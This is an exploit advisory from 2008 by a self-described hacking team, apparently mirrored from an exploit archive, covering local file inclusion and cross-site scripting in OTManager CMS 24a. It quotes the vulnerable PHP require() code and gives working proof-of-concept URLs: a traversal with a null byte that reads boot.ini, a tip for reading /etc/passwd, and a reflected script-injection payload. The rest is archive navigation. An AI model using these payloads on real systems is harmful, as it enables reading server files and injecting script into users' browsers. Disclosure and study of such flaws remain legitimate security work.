otmanager-lfixss.txt

otmanager-lfixss.txt: Posted Jun 28, 2008; Authored by CWH Underground | Site citecclub.org; OTManager CMS version 24a suffers from local file inclusion and cross site scripting vulnerabilities.; tags | exploit, local, vulnerability, xss, file inclusion; SHA-256 | 2421263c1a78925b81d5173a2e148a1cd24bcf9b2408819cfae5dfd26e63aa8b; Download | Favorite | View

otmanager-lfixss.txt

===========================================================
  OTManager CMS (LFI/XSS) Multiple Remote Vulnerabilities
===========================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O  .. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 27 June 2008
SITE   : cwh.citec.us


#####################################################
 APPLICATION : OTManager CMS
 VERSION     : 24a Completo
 VENDOR      : http://www.otmanager.org/
 DOWNLOAD    : http://downloads.sourceforge.net/otm/OTManager_v24a_Completo.zip
#####################################################

---------------------------------------
 Vulnerable File [index.php?conteudo=]
---------------------------------------

@Line

   76:  if($_REQUEST['conteudo']==""){
   77:  require("Principal.php");
   78:  }else{
   79:  if(!file_exists($_REQUEST['conteudo'].".php")){
   80:  echo '<center><font size="3"><b>404 URL Invalida</b></font><br><br>Por Favor, Selecione o Conteudo no Menu ao Lado.</center>';
   81:  }else{
   82:       require($_REQUEST['conteudo'].".php");
   83:       }
   84:  }


---------
 Exploit
---------

#####
 LFI
#####

[+] http://[Target]/[otmanager_path]/index.php?conteudo=[LFI]

   
    This exploit will open boot.ini in system file:

[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)
\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect

    You can change boot.ini to /etc/passwd%00 in linux OS, For view pass hash.

#####
 XSS
#####

[+] http://[Target]/[otmanager_path]/index.php?conteudo=[XSS]


-------------
 POC Exploit
-------------

#####
 LFI
#####

[+] http://192.168.24.25/otmanager/index.php?conteudo=../../../../../../../../boot.ini%00

#####
 XSS
#####

[+] http://192.168.24.25/otmanager/index.php?conteudo=</title><script>alert('XSS test');</script>


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

Top Authors In Last 30 Days

Red Hat 229 files
indoushka 167 files
Jay Turla 150 files
Ubuntu 67 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,124)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,237)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,845)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,852)
UNIX (9,456)
UnixWare (188)
Windows (6,772)
Other

otmanager-lfixss.txt

otmanager-lfixss.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

otmanager-lfixss.txt

Share This

otmanager-lfixss.txt

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems